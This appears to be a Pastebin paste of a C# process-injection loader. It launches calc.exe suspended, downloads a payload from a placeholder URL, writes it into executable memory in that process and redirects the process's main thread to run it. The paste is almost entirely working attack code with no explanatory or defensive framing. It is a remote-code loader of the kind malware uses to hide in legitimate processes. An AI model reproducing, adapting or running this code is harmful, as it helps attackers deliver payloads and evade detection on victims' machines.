API tools faq
paste
Advertisement
xosski

Process injection

xosski
Jan 2nd, 2025
11
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.02 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Diagnostics;
  3. using System.IO;
  4. using System.Net.Http;
  5. using System.Runtime.InteropServices;
  6. using System.Threading.Tasks;
  7.  
  8. class Program
  9. {
  10. // Constants
  11. private const uint CREATE_SUSPENDED = 0x00000004;
  12. private const uint CONTEXT_FULL = 0x10000B;
  13. private const uint MEM_COMMIT = 0x1000;
  14. private const uint MEM_RESERVE = 0x2000;
  15. private const uint PAGE_EXECUTE_READWRITE = 0x40;
  16.  
  17. [StructLayout(LayoutKind.Sequential)]
  18. public struct SECURITY_ATTRIBUTES
  19. {
  20. public uint nLength;
  21. public IntPtr lpSecurityDescriptor;
  22. public bool bInheritHandle;
  23. }
  24.  
  25. [StructLayout(LayoutKind.Sequential)]
  26. public struct PROCESS_INFORMATION
  27. {
  28. public IntPtr hProcess;
  29. public IntPtr hThread;
  30. public uint dwProcessId;
  31. public uint dwThreadId;
  32. }
  33.  
  34. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  35. public struct STARTUPINFO
  36. {
  37. public uint cb;
  38. public string lpReserved;
  39. public string lpDesktop;
  40. public string lpTitle;
  41. public uint dwX;
  42. public uint dwY;
  43. public uint dwXSize;
  44. public uint dwYSize;
  45. public uint dwXCountChars;
  46. public uint dwYCountChars;
  47. public uint dwFillAttribute;
  48. public uint dwFlags;
  49. public ushort wShowWindow;
  50. public ushort cbReserved2;
  51. public IntPtr lpReserved2;
  52. public IntPtr hStdInput;
  53. public IntPtr hStdOutput;
  54. public IntPtr hStdError;
  55. }
  56.  
  57. [StructLayout(LayoutKind.Sequential)]
  58. public struct CONTEXT64
  59. {
  60. public ulong P1Home;
  61. public ulong P2Home;
  62. public ulong P3Home;
  63. public ulong P4Home;
  64. public ulong P5Home;
  65. public ulong P6Home;
  66. public uint ContextFlags;
  67. public uint MxCsr;
  68. public ushort SegCs;
  69. public ushort SegDs;
  70. public ushort SegEs;
  71. public ushort SegFs;
  72. public ushort SegGs;
  73. public ushort SegSs;
  74. public uint EFlags;
  75. public ulong Dr0;
  76. public ulong Dr1;
  77. public ulong Dr2;
  78. public ulong Dr3;
  79. public ulong Dr6;
  80. public ulong Dr7;
  81. public ulong Rax;
  82. public ulong Rcx;
  83. public ulong Rdx;
  84. public ulong Rbx;
  85. public ulong Rsp;
  86. public ulong Rbp;
  87. public ulong Rsi;
  88. public ulong Rdi;
  89. public ulong R8;
  90. public ulong R9;
  91. public ulong R10;
  92. public ulong R11;
  93. public ulong R12;
  94. public ulong R13;
  95. public ulong R14;
  96. public ulong R15;
  97. public ulong Rip;
  98. }
  99.  
  100. // P/Invoke declarations
  101. [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
  102. public static extern bool CreateProcess(
  103. string lpApplicationName,
  104. string lpCommandLine,
  105. IntPtr lpProcessAttributes,
  106. IntPtr lpThreadAttributes,
  107. bool bInheritHandles,
  108. uint dwCreationFlags,
  109. IntPtr lpEnvironment,
  110. string lpCurrentDirectory,
  111. ref STARTUPINFO lpStartupInfo,
  112. out PROCESS_INFORMATION lpProcessInformation);
  113.  
  114. [DllImport("kernel32.dll", SetLastError = true)]
  115. public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
  116.  
  117. [DllImport("kernel32.dll", SetLastError = true)]
  118. public static extern IntPtr VirtualAllocEx(
  119. IntPtr hProcess,
  120. IntPtr lpAddress,
  121. uint dwSize,
  122. uint flAllocationType,
  123. uint flProtect);
  124.  
  125. [DllImport("kernel32.dll", SetLastError = true)]
  126. public static extern bool WriteProcessMemory(
  127. IntPtr hProcess,
  128. IntPtr lpBaseAddress,
  129. byte[] lpBuffer,
  130. uint nSize,
  131. out IntPtr lpNumberOfBytesWritten);
  132.  
  133. [DllImport("kernel32.dll", SetLastError = true)]
  134. public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
  135.  
  136. [DllImport("kernel32.dll", SetLastError = true)]
  137. public static extern uint ResumeThread(IntPtr hThread);
  138.  
  139. static async Task Main(string[] args)
  140. {
  141. string payloadUrl = "http://example.com/payload.exe"; // Replace with user input
  142. string targetExe = @"C:\WINDOWS\System32\calc.exe";
  143.  
  144. Console.WriteLine($"Starting {targetExe} in suspended state...");
  145.  
  146. STARTUPINFO startupInfo = new STARTUPINFO();
  147. PROCESS_INFORMATION processInfo;
  148.  
  149. if (!CreateProcess(
  150. null,
  151. targetExe,
  152. IntPtr.Zero,
  153. IntPtr.Zero,
  154. false,
  155. CREATE_SUSPENDED,
  156. IntPtr.Zero,
  157. null,
  158. ref startupInfo,
  159. out processInfo))
  160. {
  161. Console.WriteLine($"Error creating process: {Marshal.GetLastWin32Error()}");
  162. return;
  163. }
  164.  
  165. Console.WriteLine("Downloading payload...");
  166. byte[] payloadData = await DownloadPayloadAsync(payloadUrl);
  167.  
  168. CONTEXT64 context = new CONTEXT64 { ContextFlags = CONTEXT_FULL };
  169. if (!GetThreadContext(processInfo.hThread, ref context))
  170. {
  171. Console.WriteLine($"Error getting thread context: {Marshal.GetLastWin32Error()}");
  172. return;
  173. }
  174.  
  175. IntPtr allocatedMemory = VirtualAllocEx(
  176. processInfo.hProcess,
  177. IntPtr.Zero,
  178. (uint)payloadData.Length,
  179. MEM_COMMIT | MEM_RESERVE,
  180. PAGE_EXECUTE_READWRITE);
  181.  
  182. if (allocatedMemory == IntPtr.Zero)
  183. {
  184. Console.WriteLine($"Error allocating memory: {Marshal.GetLastWin32Error()}");
  185. return;
  186. }
  187.  
  188. Console.WriteLine($"Memory allocated at {allocatedMemory}");
  189.  
  190. IntPtr bytesWritten;
  191. if (!WriteProcessMemory(processInfo.hProcess, allocatedMemory, payloadData, (uint)payloadData.Length, out bytesWritten))
  192. {
  193. Console.WriteLine($"Error writing payload: {Marshal.GetLastWin32Error()}");
  194. return;
  195. }
  196.  
  197. context.Rip = (ulong)allocatedMemory;
  198. if (!SetThreadContext(processInfo.hThread, ref context))
  199. {
  200. Console.WriteLine($"Error setting thread context: {Marshal.GetLastWin32Error()}");
  201. return;
  202. }
  203.  
  204. Console.WriteLine("Resuming thread...");
  205. if (ResumeThread(processInfo.hThread) == 0)
  206. {
  207. Console.WriteLine($"Error resuming thread: {Marshal.GetLastWin32Error()}");
  208. return;
  209. }
  210.  
  211. Console.WriteLine("Injection complete.");
  212. }
  213.  
  214. // Async method to download the payload
  215. static async Task<byte[]> DownloadPayloadAsync(string url)
  216. {
  217. using (HttpClient client = new HttpClient())
  218. {
  219. try
  220. {
  221. return await client.GetByteArrayAsync(url);
  222. }
  223. catch (Exception ex)
  224. {
  225. Console.WriteLine($"Error downloading payload: {ex.Message}");
  226. return null;
  227. }
  228. }
  229. }
  230. }
Tags: inject injection
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!